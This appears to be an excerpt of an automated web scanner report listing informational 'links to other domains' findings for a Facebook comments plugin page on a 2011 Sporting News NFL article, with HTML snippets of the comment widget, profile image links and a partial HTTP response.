</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16360361_10150175151464920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 5:57pm" data-date="Wed, 04 May 2011 17:57:33 -0700" class="timestamp">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1702633465" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41655_1702633465_9909_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1702633465" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41655_1702633465_9909_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1329611005" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49225_1329611005_1636_q.jpg" /></a>
...[SNIP]...
<span class="uiMorePagerLoader pam uiBoxWhite topborder fbFeedbackPagerLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></span>
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/dcashin" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195666_803749624_3820493_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16360789_10150175169889920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 6:24pm" data-date="Wed, 04 May 2011 18:24:57 -0700" class="timestamp">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="#" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186692_1830128021_6341647_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=777698905" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49146_777698905_4333735_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/dcashin" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195666_803749624_3820493_q.jpg" /></a>
...[SNIP]...
<span class="uiMorePagerLoader pam uiBoxWhite topborder fbFeedbackPagerLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></span>
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1440527900" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211995_1440527900_6271125_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359628_10150175124154920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 5:09pm" data-date="Wed, 04 May 2011 17:09:18 -0700" class="timestamp">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/mutsai.sifana" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/23094_1026664643_4591_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/jeff.klora" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27410_1501705828_2044_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="#" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27421_100000139735724_4046_q.jpg" /></a>
...[SNIP]...
<span class="uiMorePagerLoader pam uiBoxWhite topborder fbFeedbackPagerLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></span>
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="#" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211287_1286867422_6012394_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16358036_10150175060969920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 3:14pm" data-date="Wed, 04 May 2011 15:14:49 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1308392513" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49142_1308392513_7533553_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16358894_10150175094164920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 4:10pm" data-date="Wed, 04 May 2011 16:10:52 -0700" class="timestamp">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=100002122115800" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187272_100002122115800_7062068_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1385528027" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="#" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49461_1247709577_2754_q.jpg" /></a>
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<span class="uiMorePagerLoader pam uiBoxLightblue fbFeedbackPagerLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></span>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

16.47. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?api_key=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d35cd15c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffeb4109d%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Faol.sportingnews.com%2Fnfl%2Fstory%2F2011-05-04%2Fathletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter&locale=en_US&numposts=10&sdk=joey&width=650

The response contains the following links to other domains:

http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16357140_10150175027384920
http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16358036_10150175060969920
http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16358894_10150175094164920
http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359088_10150175101634920
http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359614_10150175123854920
http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359628_10150175124154920
http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359685_10150175126409920
http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359722_10150175127474920
http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359755_10150175128634920
http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359879_10150175133554920
http://profile.ak.fbcdn.net/hprofile-ak-snc4/161188_1020937929_5104297_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/174525_1054627735_64789_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187208_100000934370777_6596943_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187593_100001547816690_2540739_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195286_100001088242101_5524507_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203420_1829766991_3267656_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211232_1708077046_5678275_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211287_1286867422_6012394_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211995_1440527900_6271125_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/27364_827759867_7310_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41774_1675365945_9562_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/49142_1308392513_7533553_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/49859_516351764_9151_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/50095_1231308703_4625795_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/kKOeJEnwuz7.css
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/4wOZW9c83Yr.css
http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/Z6PtFE_aVAz.css
http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/D97gxsfJDCQ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/akOVLqNGOB0.png
http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.43.43
X-Cnection: close
Date: Thu, 05 May 2011 00:58:07 GMT
Content-Length: 94355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/D97gxsfJDCQ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/Z6PtFE_aVAz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/kKOeJEnwuz7.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/4wOZW9c83Yr.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
<a class="viewerProfileHref" onclick="return false;" target="_blank" href="#"><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /></a>
...[SNIP]...
</div><img class="throbber img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /><div class="postToProfile hidden_elem">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/wmoppert" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41774_1675365945_9562_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359088_10150175101634920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 4:25pm" data-date="Wed, 04 May 2011 16:25:34 -0700" class="timestamp">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/matthew.oliveira2" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195286_100001088242101_5524507_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1708077046" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211232_1708077046_5678275_q.jpg" /></a>
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=100001547816690" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187593_100001547816690_2540739_q.jpg" /></a>
...[SNIP]...
<span class="fsm fwn fcg"> .. <img class="star img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/akOVLqNGOB0.png" width="15" height="14" /> Top Commenter .. <a class="uiLinkSubtle" href="http://www.facebook.com/pages/Editor-in-Chief/137829579583400" target="_blank">
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16357140_10150175027384920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 2:23pm" data-date="Wed, 04 May 2011 14:23:54 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="#" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211287_1286867422_6012394_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16358036_10150175060969920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 3:14pm" data-date="Wed, 04 May 2011 15:14:49 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1308392513" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49142_1308392513_7533553_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16358894_10150175094164920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 4:10pm" data-date="Wed, 04 May 2011 16:10:52 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1440527900" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211995_1440527900_6271125_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359628_10150175124154920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 5:09pm" data-date="Wed, 04 May 2011 17:09:18 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1020937929" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161188_1020937929_5104297_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359722_10150175127474920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 5:14pm" data-date="Wed, 04 May 2011 17:14:50 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=100000934370777" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187208_100000934370777_6596943_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359685_10150175126409920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 5:12pm" data-date="Wed, 04 May 2011 17:12:50 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=827759867" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27364_827759867_7310_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359755_10150175128634920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 5:16pm" data-date="Wed, 04 May 2011 17:16:48 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1054627735" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174525_1054627735_64789_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359614_10150175123854920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 5:08pm" data-date="Wed, 04 May 2011 17:08:43 -0700" class="timestamp">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1829766991" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203420_1829766991_3267656_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1231308703" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50095_1231308703_4625795_q.jpg" /></a>
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=516351764" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49859_516351764_9151_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359879_10150175133554920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 5:25pm" data-date="Wed, 04 May 2011 17:25:36 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<span class="uiMorePagerLoader pam uiBoxLightblue fbFeedbackPagerLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></span>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

16.48. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?api_key=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d35cd15c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffeb4109d%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Faol.sportingnews.com%2Fnfl%2Fstory%2F2011-05-04%2Fathletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter&locale=en_US&numposts=10&sdk=joey&width=650

The response contains the following links to other domains:

http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16357140_10150175027384920
http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16358036_10150175060969920
http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16358894_10150175094164920
http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359088_10150175101634920
http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359614_10150175123854920
http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359628_10150175124154920
http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359685_10150175126409920
